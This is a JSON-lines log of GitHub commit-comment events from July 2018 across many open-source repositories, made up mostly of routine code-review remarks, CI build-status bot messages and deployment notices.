{"id":"8024911131","type":"CommitCommentEvent","actor":{"login":"groovecoder"},"repo":{"name":"techlahoma/board_meetings"},"payload":{"comment":{"id":29849429,"position":16,"line":16,"path":"2018/07_july_minutes.md","commit_id":"229beae69de03df2ec41e2c4bbca0993a8d23abe","created_at":"2018-07-26T20:03:10Z","updated_at":"2018-07-26T20:03:10Z","author_association":"MEMBER","body":"I attended."}},"created_at":"2018-07-26T20:03:10Z"}
{"id":"8024911923","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849430,"position":24,"line":24,"path":"src/librustc_target/spec/riscv32imac_unknown_none.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:03:20Z","updated_at":"2018-07-26T20:03:20Z","author_association":"NONE","body":"As per my comment in the other commit. This should be \"riscv32\" to match LLVM naming convention."}},"created_at":"2018-07-26T20:03:20Z"}
{"id":"8024914998","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29849437,"position":44,"line":4740,"path":"lib/Sema/TypeCheckDecl.cpp","commit_id":"6a8d3211aa8fc3d24262306aa94c3a6cf633cd6c","created_at":"2018-07-26T20:04:00Z","updated_at":"2018-07-26T20:04:00Z","author_association":"MEMBER","body":"This call disappeared?"}},"created_at":"2018-07-26T20:04:00Z"}
{"id":"8024918279","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29849446,"position":null,"line":null,"path":null,"commit_id":"32dfab8b8ac71afe1f1554699c240068a95e76e0","created_at":"2018-07-26T20:04:41Z","updated_at":"2018-07-26T20:04:41Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/32dfab8b8ac71afe1f1554699c240068a95e76e0/index.html"}},"created_at":"2018-07-26T20:04:41Z"}
{"id":"8024920083","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29849452,"position":13,"line":99,"path":"src/core/system_parameters/beidou_cnav2_utc_model.cc","commit_id":"fcee0032e4582d78e84b35a81c407e364e466161","created_at":"2018-07-26T20:05:03Z","updated_at":"2018-07-26T20:05:03Z","author_association":"OWNER","body":"Does not `pow` or `*` achieve the same here?. No need to reinvent the wheel unless it is necessary. :)"}},"created_at":"2018-07-26T20:05:03Z"}
{"id":"8024922079","type":"CommitCommentEvent","actor":{"login":"dmiralles2009"},"repo":{"name":"dmiralles2009/gnss-sdr"},"payload":{"comment":{"id":29849460,"position":null,"line":null,"path":null,"commit_id":"fcee0032e4582d78e84b35a81c407e364e466161","created_at":"2018-07-26T20:05:27Z","updated_at":"2018-07-26T20:05:27Z","author_association":"OWNER","body":"Much better now, just curious about the unit test portion of the code :)"}},"created_at":"2018-07-26T20:05:27Z"}
{"id":"8024925192","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29849467,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-26T20:06:07Z","updated_at":"2018-07-26T20:06:07Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T20:06:07Z"}
{"id":"8024926470","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849470,"position":31,"line":31,"path":"src/librustc_target/spec/riscv32imac_unknown_none.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:06:22Z","updated_at":"2018-07-26T20:06:22Z","author_association":"NONE","body":"`+i` doesn't appear here. I assume I is the base of all the ISA variants?"}},"created_at":"2018-07-26T20:06:22Z"}
{"id":"8024929266","type":"CommitCommentEvent","actor":{"login":"greenpart"},"repo":{"name":"paulcamper/mangopay2-go-sdk"},"payload":{"comment":{"id":29849476,"position":35,"line":224,"path":"service.go","commit_id":"143cc63aef2735e4977c83cef9d1478d8017ea9b","created_at":"2018-07-26T20:06:55Z","updated_at":"2018-07-26T20:06:55Z","author_association":"MEMBER","body":"Please cover the case when `j[\"errors\"]` will not be a `map[string]string`.\r\nIt will lead to panic in current implementation."}},"created_at":"2018-07-26T20:06:55Z"}
{"id":"8024929451","type":"CommitCommentEvent","actor":{"login":"Xarfo"},"repo":{"name":"Xarfo/Lambda-Hello"},"payload":{"comment":{"id":29849477,"position":null,"line":null,"path":null,"commit_id":"e2de62a8fb95c1f9db814ea9a58a0b58f6e22a8e","created_at":"2018-07-26T20:06:58Z","updated_at":"2018-07-26T20:06:58Z","author_association":"OWNER","body":"@BigKnell Core Hello Challenge"}},"created_at":"2018-07-26T20:06:58Z"}
{"id":"8024939063","type":"CommitCommentEvent","actor":{"login":"anselmbradford"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29849497,"position":null,"line":null,"path":null,"commit_id":"551335eedf62261299af7aafdfc896b3aef8de67","created_at":"2018-07-26T20:09:02Z","updated_at":"2018-07-26T20:09:02Z","author_association":"CONTRIBUTOR","body":"I agree `foo.hasOwnProperty(key)` is clearer, albeit not totally the intent."}},"created_at":"2018-07-26T20:09:02Z"}
{"id":"8024940769","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849504,"position":28,"line":28,"path":"src/librustc_target/spec/riscv32imac_unknown_none.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:09:24Z","updated_at":"2018-07-26T20:09:24Z","author_association":"NONE","body":"Is LLD linking support on par with riscv-gcc's? If not it would probably best to stick to the more battle tested riscv-gcc.\r\n\r\nIf LLD support is in good shape then we may want to use `rust-lld` here, which is the LLD binary that ships with the rustc toolchain. The wasm32-unknown-unknown target also makes use of it."}},"created_at":"2018-07-26T20:09:24Z"}
{"id":"8024946828","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29849522,"position":13,"line":35,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"135ac7bd3cfe91b57d2a2e4ed759e2af29b6ea45","created_at":"2018-07-26T20:10:38Z","updated_at":"2018-07-26T20:10:38Z","author_association":"MEMBER","body":"Yes, sorry. I tried to make it consistent but failed not knowing our intentions for italics."}},"created_at":"2018-07-26T20:10:38Z"}
{"id":"8024949000","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849530,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T20:11:06Z","updated_at":"2018-07-26T20:11:06Z","author_association":"NONE","body":"You should always write unit test for any feature you add, it helps catch and debug a specific area of your code, I would expect to see a test that ensures the advice is getting invoked and works"}},"created_at":"2018-07-26T20:11:06Z"}
{"id":"8024950248","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29849538,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T20:11:20Z","updated_at":"2018-07-26T20:11:20Z","author_association":"MEMBER","body":"> Where would you print this notice? Would you add it to regular outputs?\r\n\r\nRegular output would be fine, and simplest for now. Or I think the kernel protocol has a warning side-channel.\r\n\r\nA fancy option is: https://www.stefaanlippens.net/jupyter-notebook-dialog.html\r\n"}},"created_at":"2018-07-26T20:11:20Z"}
{"id":"8024952237","type":"CommitCommentEvent","actor":{"login":"MartinMSPedersen"},"repo":{"name":"MartinMSPedersen/ggpval"},"payload":{"comment":{"id":29849544,"position":null,"line":null,"path":null,"commit_id":"4ef5771e5aaa5c4b233ab1eb76c8811253e79009","created_at":"2018-07-26T20:11:44Z","updated_at":"2018-07-26T20:11:44Z","author_association":"OWNER","body":"Fix:\r\nhttps://cran.r-project.org/package=ggpval shows the title \"Title of your vignette\""}},"created_at":"2018-07-26T20:11:44Z"}
{"id":"8024955975","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29849551,"position":28,"line":42,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-26T20:12:29Z","updated_at":"2018-07-26T20:12:29Z","author_association":"MEMBER","body":"I like this solution, and have filed an issue https://github.com/gradle/dotorg-docs/issues/256"}},"created_at":"2018-07-26T20:12:29Z"}
{"id":"8024956913","type":"CommitCommentEvent","actor":{"login":"Xarfo"},"repo":{"name":"LambdaSchool/Lambda-Hello"},"payload":{"comment":{"id":29849556,"position":null,"line":null,"path":null,"commit_id":"128b16d964a3a50cb0d01109a916f4bd2971a009","created_at":"2018-07-26T20:12:40Z","updated_at":"2018-07-26T20:12:40Z","author_association":"NONE","body":"@BigKnell Branch Challenge"}},"created_at":"2018-07-26T20:12:40Z"}
{"id":"8024958049","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29849559,"position":null,"line":null,"path":null,"commit_id":"10b292d2645f5252f45855703bf6dd5781c793ee","created_at":"2018-07-26T20:12:54Z","updated_at":"2018-07-26T20:12:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-420](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-420).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-420-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T20:12:54Z"}
{"id":"8024959897","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849564,"position":31,"line":31,"path":"src/librustc_target/spec/riscv32imac_unknown_none.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:13:17Z","updated_at":"2018-07-26T20:13:17Z","author_association":"NONE","body":"Or rather I guess my question is how does LLVM differentiate between e.g. RV32I and RV32E? Is there a `+e` flag? Or does LLVM not support RV32E atm?"}},"created_at":"2018-07-26T20:13:17Z"}
{"id":"8024960007","type":"CommitCommentEvent","actor":{"login":"qwazwsx"},"repo":{"name":"qwazwsx/c4-cams"},"payload":{"comment":{"id":29849565,"position":null,"line":null,"path":null,"commit_id":"4992df26ce004b3e30e1e21cb0707e7d8a2c31b4","created_at":"2018-07-26T20:13:18Z","updated_at":"2018-07-26T20:13:18Z","author_association":"OWNER","body":"hey dumbass you broke voting"}},"created_at":"2018-07-26T20:13:18Z"}
{"id":"8024963644","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29849576,"position":4,"line":380,"path":"src/librustc_target/spec/mod.rs","commit_id":"9fab077ed2144f70801a128e0b93a923340c4eac","created_at":"2018-07-26T20:14:03Z","updated_at":"2018-07-26T20:14:03Z","author_association":"NONE","body":"> may want to use riscv32+imac-none-elf\r\n\r\nOr maybe `riscv32i+mac-none-elf` since RV32I is the base instruction set."}},"created_at":"2018-07-26T20:14:03Z"}
{"id":"8024967052","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849582,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T20:14:46Z","updated_at":"2018-07-26T20:14:46Z","author_association":"COLLABORATOR","body":"So far all advices i added were for external modules, it makes sense and\nrequires less work to write similar tests for core advices but external\nmodules would require running them in my test environment which i don't\nconsider in all cases, but for core i definitely do but any test around\nthis won't be ran since the failure is when spring is initialising\n\nOn Thu, Jul 26, 2018 at 11:11 PM Wyclif Luyima <notifications@github.com>\nwrote:\n\n> You should always write unit test for any feature you add, it helps catch\n> and debug a specific area of your code, I would expect to see a test that\n> ensures the advice is getting invoked and works\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/e4317249e73da99bf34c4a78b8de9d71c96a6b88#commitcomment-29849530>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8rWj-YEe2V3Ml6jKEhn6NB95AycNks5uKiJagaJpZM4ViVWD>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-26T20:14:46Z"}
{"id":"8024968043","type":"CommitCommentEvent","actor":{"login":"WzL"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29849587,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T20:14:59Z","updated_at":"2018-07-26T20:14:59Z","author_association":"NONE","body":"Same problem here, went from v0.54_2 to v0.54_2 as a result all my offloading frontends are presenting the default certificate instead of the additional certificates using SNI."}},"created_at":"2018-07-26T20:14:59Z"}
{"id":"8024973387","type":"CommitCommentEvent","actor":{"login":"njmo"},"repo":{"name":"ympek/arena"},"payload":{"comment":{"id":29849600,"position":18,"line":61,"path":"server/src/main/java/Room.java","commit_id":"9b76fdbd5d90e8179c058b33705490596ef64090","created_at":"2018-07-26T20:16:06Z","updated_at":"2018-07-26T20:16:06Z","author_association":"NONE","body":"consider using weed"}},"created_at":"2018-07-26T20:16:06Z"}
{"id":"8024975588","type":"CommitCommentEvent","actor":{"login":"rostovtsev"},"repo":{"name":"webmin/usermin"},"payload":{"comment":{"id":29849609,"position":null,"line":null,"path":null,"commit_id":"a31632b637bf7c8dd6f4d36413d51d064779e62a","created_at":"2018-07-26T20:16:32Z","updated_at":"2018-07-26T20:16:32Z","author_association":"COLLABORATOR","body":"I will fix it the first thing in the morning. \n\nAnd about the header title, should it be just LDAP? Or old way, Qmail+LDAP? It doesn't seem that there are any options related to Qmail?"}},"created_at":"2018-07-26T20:16:32Z"}
{"id":"8024976824","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/compiler-builtins"},"payload":{"comment":{"id":29849615,"position":4,"line":61,"path":"src/lib.rs","commit_id":"c200f6dd62fc538cb5abf0832a95976640120e0e","created_at":"2018-07-26T20:16:47Z","updated_at":"2018-07-26T20:16:47Z","author_association":"NONE","body":"Change \"riscv\" to \"riscv32\" in both the attribute and the mod item."}},"created_at":"2018-07-26T20:16:47Z"}
{"id":"8024987553","type":"CommitCommentEvent","actor":{"login":"jr549"},"repo":{"name":"jr549/angular-bootstrap-weather"},"payload":{"comment":{"id":29849643,"position":null,"line":null,"path":null,"commit_id":"ddce9ec19a891bb75178b20b2e69f6e85d00b02a","created_at":"2018-07-26T20:19:03Z","updated_at":"2018-07-26T20:19:03Z","author_association":"OWNER","body":"Sitemap added to root"}},"created_at":"2018-07-26T20:19:03Z"}
{"id":"8024989880","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849645,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T20:19:31Z","updated_at":"2018-07-26T20:19:31Z","author_association":"NONE","body":"I think I've lost you, unit test are unit tests, they are good to always include always."}},"created_at":"2018-07-26T20:19:31Z"}
{"id":"8024991885","type":"CommitCommentEvent","actor":{"login":"taylor-jones"},"repo":{"name":"taylor-jones/Meal-Wheel"},"payload":{"comment":{"id":29849648,"position":7,"line":219,"path":"app/public/stylesheets/style.css","commit_id":"0371eacf034d4cb2f9a06ddd812866ce4a03be5d","created_at":"2018-07-26T20:19:56Z","updated_at":"2018-07-26T20:19:56Z","author_association":"OWNER","body":"I noticed the wheel image was off-centered on \"small\" size screens, so I changed the width, and it's now looking centered all the time."}},"created_at":"2018-07-26T20:19:56Z"}
{"id":"8024993525","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29849653,"position":null,"line":null,"path":null,"commit_id":"15f08f8cc6881dbb29aaa0ee05bc71b9629cb9ac","created_at":"2018-07-26T20:20:16Z","updated_at":"2018-07-26T20:20:16Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-158](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-158).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-158-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T20:20:16Z"}
{"id":"8025000844","type":"CommitCommentEvent","actor":{"login":"taylor-jones"},"repo":{"name":"taylor-jones/Meal-Wheel"},"payload":{"comment":{"id":29849669,"position":5,"line":10,"path":"app/views/index.ejs","commit_id":"0371eacf034d4cb2f9a06ddd812866ce4a03be5d","created_at":"2018-07-26T20:21:41Z","updated_at":"2018-07-26T20:21:41Z","author_association":"OWNER","body":"I noticed the wheel image was off-centered on \"small\" size screens, so I changed its column to make sure it can be centered within the entire width at all viewport sizes."}},"created_at":"2018-07-26T20:21:41Z"}
{"id":"8025001265","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"deivids84/MA-XML-10-CATALAN"},"payload":{"comment":{"id":29849670,"position":null,"line":null,"path":null,"commit_id":"e01502d0de9ce99ab58fbc23d74cec65ae0ab288","created_at":"2018-07-26T20:21:46Z","updated_at":"2018-07-26T20:21:46Z","author_association":"COLLABORATOR","body":"Do not add xliff \r\nhttps://translators.xiaomi.eu/XML_MIUI10-Catalan-ca.html"}},"created_at":"2018-07-26T20:21:46Z"}
{"id":"8025006244","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29849681,"position":null,"line":null,"path":null,"commit_id":"ab7b278ca3992bfecf4b009137bf854d69571f9b","created_at":"2018-07-26T20:22:46Z","updated_at":"2018-07-26T20:22:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-421](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-421).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-421-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T20:22:46Z"}
{"id":"8025009324","type":"CommitCommentEvent","actor":{"login":"taylor-jones"},"repo":{"name":"taylor-jones/Meal-Wheel"},"payload":{"comment":{"id":29849689,"position":null,"line":null,"path":null,"commit_id":"0371eacf034d4cb2f9a06ddd812866ce4a03be5d","created_at":"2018-07-26T20:23:23Z","updated_at":"2018-07-26T20:23:23Z","author_association":"OWNER","body":"I was thinking we might be able to move the recipe card into a partial with the idea that maybe we'd be able to use it in singleRecipe and for the recipe result on index.ejs. "}},"created_at":"2018-07-26T20:23:23Z"}
{"id":"8025047837","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29849775,"position":null,"line":null,"path":null,"commit_id":"5def8bf9ebd718577087c14a01388db7d73656f5","created_at":"2018-07-26T20:30:52Z","updated_at":"2018-07-26T20:30:52Z","author_association":"OWNER","body":"Settings should go in `tests/settings.py`, since that's the Django settings module used by the tests and for [manage.py](https://github.com/sloria/django-elasticsearch-metrics/blob/ce638daac3a80903f82c623ae49309be95de01cf/manage.py#L6)"}},"created_at":"2018-07-26T20:30:52Z"}
{"id":"8025052054","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29849786,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T20:31:42Z","updated_at":"2018-07-26T20:31:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T20:31:42Z"}
{"id":"8025053448","type":"CommitCommentEvent","actor":{"login":"DougGregor"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29849790,"position":44,"line":4740,"path":"lib/Sema/TypeCheckDecl.cpp","commit_id":"6a8d3211aa8fc3d24262306aa94c3a6cf633cd6c","created_at":"2018-07-26T20:31:59Z","updated_at":"2018-07-26T20:31:59Z","author_association":"MEMBER","body":"It's still in `validateDecl()`. There's more work to be done to get access-control checks out of there."}},"created_at":"2018-07-26T20:31:59Z"}
{"id":"8025054930","type":"CommitCommentEvent","actor":{"login":"chaudhari31"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29849795,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T20:32:18Z","updated_at":"2018-07-26T20:32:18Z","author_association":"NONE","body":"If we use #!/bin/sh then it will give error for  getopts. I would suggest use #!/bin/bash then it will work without any issue.\r\n\r\n'getopts' is not present in 'sh' shell. \r\n\r\n\r\n\r\n"}},"created_at":"2018-07-26T20:32:18Z"}
{"id":"8025057365","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29849803,"position":null,"line":null,"path":null,"commit_id":"5def8bf9ebd718577087c14a01388db7d73656f5","created_at":"2018-07-26T20:32:47Z","updated_at":"2018-07-26T20:32:47Z","author_association":"OWNER","body":"`pytest-django` has a convenient (but undocumented) [settings](https://github.com/pytest-dev/pytest-django/blob/master/pytest_django/fixtures.py#L273) fixtures that allows you to temporarily override settings for specific tests."}},"created_at":"2018-07-26T20:32:47Z"}
{"id":"8025061463","type":"CommitCommentEvent","actor":{"login":"adamnsm2"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29849812,"position":94,"line":5184,"path":"epan/dissectors/packet-ssl-utils.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T20:33:37Z","updated_at":"2018-07-26T20:33:37Z","author_association":"OWNER","body":"I'm not really sure either, we should maybe discuss this more in person"}},"created_at":"2018-07-26T20:33:37Z"}
{"id":"8025072110","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29849833,"position":null,"line":null,"path":null,"commit_id":"9744c35ef55db659f931d62979951d6aafa1aa52","created_at":"2018-07-26T20:35:48Z","updated_at":"2018-07-26T20:35:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Registro SOS): Nuevos campos](https://trello.com/c/dc9uZ9Gn/13-incidentes-featregistro-sos-nuevos-campos)"}},"created_at":"2018-07-26T20:35:48Z"}
{"id":"8025072416","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29849834,"position":null,"line":null,"path":null,"commit_id":"9744c35ef55db659f931d62979951d6aafa1aa52","created_at":"2018-07-26T20:35:51Z","updated_at":"2018-07-26T20:35:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Registro SOS): Nuevos campos](https://trello.com/c/dc9uZ9Gn/13-incidentes-featregistro-sos-nuevos-campos)"}},"created_at":"2018-07-26T20:35:51Z"}
{"id":"8025078946","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29849848,"position":null,"line":null,"path":null,"commit_id":"02ef283341c9486ecfc130b0cb7065a9217a1b3a","created_at":"2018-07-26T20:37:10Z","updated_at":"2018-07-26T20:37:10Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-49](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-49).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-49-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-26T20:37:10Z"}
{"id":"8025079039","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29849849,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T20:37:11Z","updated_at":"2018-07-26T20:37:11Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T20:37:11Z"}
{"id":"8025083708","type":"CommitCommentEvent","actor":{"login":"robertmaxwilliams"},"repo":{"name":"uw-cmg/MAST-ML"},"payload":{"comment":{"id":29849855,"position":null,"line":null,"path":null,"commit_id":"cc9903003837cbf7358e2d18997836a801ec4774","created_at":"2018-07-26T20:38:09Z","updated_at":"2018-07-26T20:38:09Z","author_association":"COLLABORATOR","body":"One more thing - use `os.path.join(a, b)` instead of `a + '/' + b` because windows uses '\\\\' as its seperator."}},"created_at":"2018-07-26T20:38:09Z"}
{"id":"8025092017","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29849867,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-26T20:39:54Z","updated_at":"2018-07-26T20:39:54Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.34%25-green.png)</a>\n"}},"created_at":"2018-07-26T20:39:54Z"}
{"id":"8025094465","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849869,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T20:40:25Z","updated_at":"2018-07-26T20:40:25Z","author_association":"NONE","body":"As I said I lost you."}},"created_at":"2018-07-26T20:40:25Z"}
{"id":"8025097871","type":"CommitCommentEvent","actor":{"login":"arielorvits"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29849881,"position":null,"line":null,"path":null,"commit_id":"ac5e8fe6ba5c45866761bf446afc3c0d2ec421fd","created_at":"2018-07-26T20:41:07Z","updated_at":"2018-07-26T20:41:07Z","author_association":"NONE","body":"@kroitor , if you choose Holo as the default - you should add \r\n`'HOT': 'Hydro Protocol'`\r\nto: okex, hadax, bitfinex\r\nhttps://coinmarketcap.com/currencies/hydro-protocol/#markets\r\nthank you"}},"created_at":"2018-07-26T20:41:07Z"}
{"id":"8025099103","type":"CommitCommentEvent","actor":{"login":"williamstudios"},"repo":{"name":"williamstudios/Nueva-carpeta"},"payload":{"comment":{"id":29849886,"position":null,"line":null,"path":null,"commit_id":"563686157011157e5a850c837b5219071f670ed0","created_at":"2018-07-26T20:41:22Z","updated_at":"2018-07-26T20:41:22Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-26T20:41:22Z"}
{"id":"8025102638","type":"CommitCommentEvent","actor":{"login":"kaboonus"},"repo":{"name":"kaboonus/Sanderling--ratting-bot-anomaly-or-asteroids-"},"payload":{"comment":{"id":29849892,"position":null,"line":null,"path":null,"commit_id":"f4fbdbe0bb9c590f55641f0ac577d32d116d68e6","created_at":"2018-07-26T20:42:05Z","updated_at":"2018-07-26T20:42:05Z","author_association":"OWNER","body":"and some new rats from asteroid belts"}},"created_at":"2018-07-26T20:42:05Z"}
